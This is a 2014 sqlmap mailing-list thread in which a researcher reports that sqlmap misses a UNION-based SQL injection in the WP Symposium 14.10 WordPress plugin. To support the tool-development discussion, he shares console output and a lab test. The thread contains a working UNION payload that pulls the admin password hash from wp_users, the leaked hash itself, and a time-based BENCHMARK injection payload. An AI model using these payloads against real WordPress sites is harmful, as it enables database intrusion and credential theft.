Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
|
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:01:26
|
Here is the console output. Attached is the traffic log in a zip:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
--risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
_
___ ___| |_____ ___ ___ {1.0-dev-180ede0}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 08:56:27
[08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
[08:56:27] [INFO] setting file for logging HTTP traffic
[08:56:27] [INFO] flushing session file
[08:56:27] [INFO] testing connection to the target URL
[08:56:27] [INFO] heuristics detected web page charset 'ascii'
[08:56:27] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[08:56:28] [INFO] target URL is stable
[08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
'tray' might not be injectable
[08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
[08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:56:28] [WARNING] reflective value(s) found and filtering out
[08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause
(MySQL comment)'
[08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause
(Generic comment)'
[08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
(MySQL comment)'
[08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
(Generic comment)'
[08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (RLIKE)'
[08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace
(original value)'
[08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
(MAKE_SET - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
(ELT - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
(bool*int - original value)'
[08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
replace (original value)'
[08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
replace (original value)'
[08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses'
[08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses (original value)'
[08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and
ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and
ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause'
[08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
clause (EXTRACTVALUE)'
[08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
clause (UPDATEXML)'
[08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING
clause (BIGINT UNSIGNED)'
[08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING
clause'
[08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
clause'
[08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
clause (EXTRACTVALUE)'
[08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
clause (UPDATEXML)'
[08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
clause (BIGINT UNSIGNED)'
[08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
clause'
[08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
(EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
(UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
(BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY
clauses'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY
clauses (EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY
clauses (UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY
clauses (BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL inline queries'
[08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
query)'
[08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
time-based blind (heavy query)' injectable
[08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:58:26] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other (potential) technique found
[08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
[08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
columns'
[08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
columns'
[08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
columns'
[08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
columns'
[08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
columns'
[08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
columns'
[08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40
columns'
[08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60
columns'
[08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80
columns'
[08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100
columns'
[08:58:54] [INFO] checking if the injection point on POST parameter 'tray'
is a false positive
POST parameter 'tray' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 2049
HTTP(s) requests:
---
Parameter: tray (POST)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=getMailMessage&tray=in_deleted AND
9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
---
[08:59:48] [INFO] testing MySQL
[08:59:48] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n]
[08:59:51] [INFO] confirming MySQL
[08:59:53] [INFO] adjusting time delay to 1 second due to good response
times
[08:59:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[08:59:53] [INFO] fetched data logged to text files under
'/home/bperry/.sqlmap/output/172.31.16.26'
[*] shutting down at 08:59:53
bperry@ubuntu:~/tools/sqlmap$
On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
mir...@gm...> wrote:
>
> Hi.
>
> I don't see a reason why this form of UNION test would be any different
> than the regular used by sqlmap. Can you please send me the traffic file
> for such run (... --flush-session -t traffic.txt) along with console
> output?
>
> Bye
> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
> wrote:
>
>> Hello!
>>
>> Playing around with the following vulnerabivlity:
>>
>> http://www.exploit-db.com/exploits/35505/
>>
>>
>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
>> result in a response from the server with the hash of the first user:
>>
>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>
>>
>> However, sqlmap only finds a time based injection. Looking at sqlmap
>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>> CONCAT(blah, blah, blah) FROM blah).
>>
>> Just a thought!
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
